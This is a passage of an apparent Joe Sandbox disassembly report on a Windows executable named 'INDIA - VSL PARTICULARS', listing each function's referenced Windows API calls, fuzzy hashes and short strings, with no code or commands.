                              • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                              • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                              • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                              • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                              Similarity
                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                              • String ID:
                              • API String ID: 2880819207-0
                              • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                              • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                              • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                              • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00430BA2
                              • ScreenToClient.USER32(?,?), ref: 00430BC1
                              • ScreenToClient.USER32(?,?), ref: 00430BE2
                              • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                              Similarity
                              • API ID: ClientRectScreen$InvalidateWindow
                              • String ID:
                              • API String ID: 357397906-0
                              • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                              • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                              • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                              • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                              APIs
                              • __wsplitpath.LIBCMT ref: 0043392E
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • __wsplitpath.LIBCMT ref: 00433950
                              • __wcsicoll.LIBCMT ref: 00433974
                              • __wcsicoll.LIBCMT ref: 0043398A
                              Similarity
                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                              • String ID:
                              • API String ID: 1187119602-0
                              • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                              • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                              APIs
                              Similarity
                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                              • String ID:
                              • API String ID: 1597257046-0
                              • Opcode ID: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                              • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                              • Opcode Fuzzy Hash: ffb306b0524748cf2939c1f0cf37236c46535da1521513c3132486090f10cb1b
                              • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                              APIs
                              • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                              • __malloc_crt.LIBCMT ref: 0041F5B6
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                              Similarity
                              • API ID: EnvironmentStrings$Free__malloc_crt
                              • String ID:
                              • API String ID: 237123855-0
                              • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                              • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                              APIs
                              Similarity
                              • API ID: DeleteDestroyObject$IconWindow
                              • String ID:
                              • API String ID: 3349847261-0
                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                              APIs
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                              Similarity
                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                              • String ID:
                              • API String ID: 2223660684-0
                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                              • LineTo.GDI32(?,?,?), ref: 00447326
                              • EndPath.GDI32(?), ref: 00447336
                              • StrokePath.GDI32(?), ref: 00447344
                              Similarity
                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                              • String ID:
                              • API String ID: 2783949968-0
                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                              APIs
                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                              Similarity
                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                              • String ID:
                              • API String ID: 2710830443-0
                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                              • String ID:
                              • API String ID: 146765662-0
                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472B63
                              • GetDC.USER32(00000000), ref: 00472B6C
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                              • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472BB2
                              • GetDC.USER32(00000000), ref: 00472BBB
                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                              • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                              • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                              APIs
                              • __getptd_noexit.LIBCMT ref: 00415150
                                • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                              • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                              • __freeptd.LIBCMT ref: 0041516B
                              • ExitThread.KERNEL32 ref: 00415173
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                              • String ID:
                              • API String ID: 1454798553-0
                              • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                              • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _strncmp
                              • String ID: Q\E
                              • API String ID: 909875538-2189900498
                              • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                              • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                              APIs
                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                              • String ID: AutoIt3GUI$Container
                              • API String ID: 2652923123-3941886329
                              • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                              • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                              • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                              • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: U$\
                              • API String ID: 2666721431-100911408
                              • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                              • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • __wcsnicmp.LIBCMT ref: 00467288
                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                              • String ID: LPT
                              • API String ID: 3035604524-1350329615
                              • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                              • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                              • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                              • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \$h
                              • API String ID: 4104443479-677774858
                              • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                              • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                              • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                              • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memcmp
                              • String ID: &
                              • API String ID: 2931989736-1010288
                              • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                              • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                              • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                              • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                              • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                              • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                              • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                              APIs
                              • _wcslen.LIBCMT ref: 00466825
                              • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CrackInternet_wcslen
                              • String ID: |
                              • API String ID: 596671847-2343686810
                              • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                              • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                              • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                              • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                              APIs
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
